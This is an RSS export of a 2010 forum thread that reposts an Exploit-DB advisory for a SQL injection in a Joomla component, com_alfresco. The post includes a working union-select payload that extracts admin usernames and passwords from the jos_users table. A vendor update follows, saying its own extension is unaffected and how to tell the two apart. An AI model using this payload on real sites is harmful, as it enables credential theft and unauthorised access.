<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Joomla Component com_alfresco SQL Injection Vulnerability in Alfresco Archive</title>
    <link>https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230897#M184027</link>
    <description>&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;A href="http://www.exploit-db.com/exploits/10952" rel="nofollow noopener noreferrer"&gt;http://www.exploit-db.com/exploits/10952&lt;/A&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;SPAN&gt;# Title: Joomla Component com_alfresco SQL Injection Vulnerability &lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# EDB-ID: 10952 &lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# CVE-ID: () &lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# OSVDB-ID: () &lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Author: FL0RiX &lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Published: 2010-01-03 &lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Verified: no &lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Download Exploit Code&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Download N/A&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;#############################################################&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;#&amp;nbsp; Joomla Component com_alfresco SQL Injection Vulnerability&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;#############################################################&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Author&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : FL0RiX&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Name&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : com_alfresco&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Greez&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : PyskE,Dr.Kacak And All Friends&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Bug Type&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : SQL Injection&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Infection&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; : Admin login bilgileri alinabilir.&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Demo Vuln.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; :&lt;/SPAN&gt;&lt;BR /&gt;&lt;A href="http://server/index.php?option=com_alfresco&amp;amp;task=edit&amp;amp;id_pan=" rel="nofollow noopener noreferrer"&gt;http://server/index.php?option=com_alfresco&amp;amp;task=edit&amp;amp;id_pan=&lt;/A&gt;&lt;SPAN&gt;[SQL INJ.]&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;# Bug Fix Advice : Zararli karakterler filtrelenmelidir.&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;#############################################################&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt; – bug code start – &amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;path/index.php?option=com_alfresco&amp;amp;task=edit&amp;amp;id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users–&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt; – bug code end of – &amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;SPAN&gt;How to rectify an error?&lt;/SPAN&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;STRONG&gt;Update:&lt;/STRONG&gt;&lt;BR /&gt;&lt;A href="http://blog.joomlatools.eu/2010/01/security-in-third-party-addons.html" rel="nofollow noopener noreferrer"&gt;http://blog.joomlatools.eu/2010/01/security-in-third-party-addons.html&lt;/A&gt;&lt;BR /&gt;&lt;SPAN&gt;"We have investigated this report, and it does not concern the Joomla:Alfresco integration that was published through Joomlatools Labs over a year ago. We have been unable to find the developer of this extension, so we believe it might be a custom extension that is not available on the JED. If you have more information, please let us know.&lt;/SPAN&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;SPAN&gt;If you have an Alfresco extension installed, you can identify it by opening /administrator/components/com_alfresco/manifest.xml. If it starts with the following header, you are using our secure extension. If it doesn't, you might be using the vulnerable extension.&lt;/SPAN&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt;name&amp;gt;Alfresco&amp;lt;/name&amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt;author&amp;gt;Joomlatools&amp;lt;/author&amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt;copyright&amp;gt;Copyright (C) 2008 Joomlatools. All rights reserved.&amp;lt;/copyright&amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt;creationdate&amp;gt;December 2008&amp;lt;/creationdate&amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt;license&amp;gt;&lt;/SPAN&gt;&lt;A href="http://www.gnu.org/licenses/gpl-2.0.html" rel="nofollow noopener noreferrer"&gt;http://www.gnu.org/licenses/gpl-2.0.html&lt;/A&gt;&lt;SPAN&gt; GNU/GPL&amp;lt;/license&amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&lt;SPAN&gt;&amp;lt;authoremail&amp;gt;&lt;/SPAN&gt;&lt;A class="jive-link-email-small" href="mailto:info@joomlatools.org" rel="nofollow noopener noreferrer"&gt;info@joomlatools.org&lt;/A&gt;&lt;SPAN&gt;&amp;lt;/authoremail&amp;gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt;authorurl&amp;gt;&lt;/SPAN&gt;&lt;A href="http://www.joomlatools.org" rel="nofollow noopener noreferrer"&gt;www.joomlatools.org&lt;/A&gt;&lt;SPAN&gt;&amp;lt;/authorurl&amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt;version&amp;gt;1.0.0&amp;lt;/version&amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;&amp;lt;description&amp;gt;This component displays an Alfresco repository using CMIS&amp;lt;/description&amp;gt;&lt;/SPAN&gt;&lt;BR /&gt;&lt;SPAN&gt;"&lt;/SPAN&gt;&lt;/BODY&gt;&lt;/HTML&gt;</description>
    <pubDate>Tue, 19 Jan 2010 10:56:14 GMT</pubDate>
    <dc:creator>morze</dc:creator>
    <dc:date>2010-01-19T10:56:14Z</dc:date>
    <item>
      <title>Joomla Component com_alfresco SQL Injection Vulnerability</title>
      <link>https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230897#M184027</link>
      <description>http://www.exploit-db.com/exploits/10952# Title: Joomla Component com_alfresco SQL Injection Vulnerability # EDB-ID: 10952 # CVE-ID: () # OSVDB-ID: () # Author: FL0RiX # Published: 2010-01-03 # Verified: no # Download Exploit Code# Download N/A########################################################</description>
      <pubDate>Tue, 19 Jan 2010 10:56:14 GMT</pubDate>
      <guid>https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230897#M184027</guid>
      <dc:creator>morze</dc:creator>
      <dc:date>2010-01-19T10:56:14Z</dc:date>
    </item>
    <item>
      <title>Re: Joomla Component com_alfresco SQL Injection Vulnerability</title>
      <link>https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230898#M184028</link>
      <description>&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;SPAN&gt;Thanks for this nice post. this is so useful for me.&lt;/SPAN&gt;&lt;/BODY&gt;&lt;/HTML&gt;</description>
      <pubDate>Fri, 26 Feb 2010 10:34:52 GMT</pubDate>
      <guid>https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230898#M184028</guid>
      <dc:creator>hax2010</dc:creator>
      <dc:date>2010-02-26T10:34:52Z</dc:date>
    </item>
  </channel>
</rss>

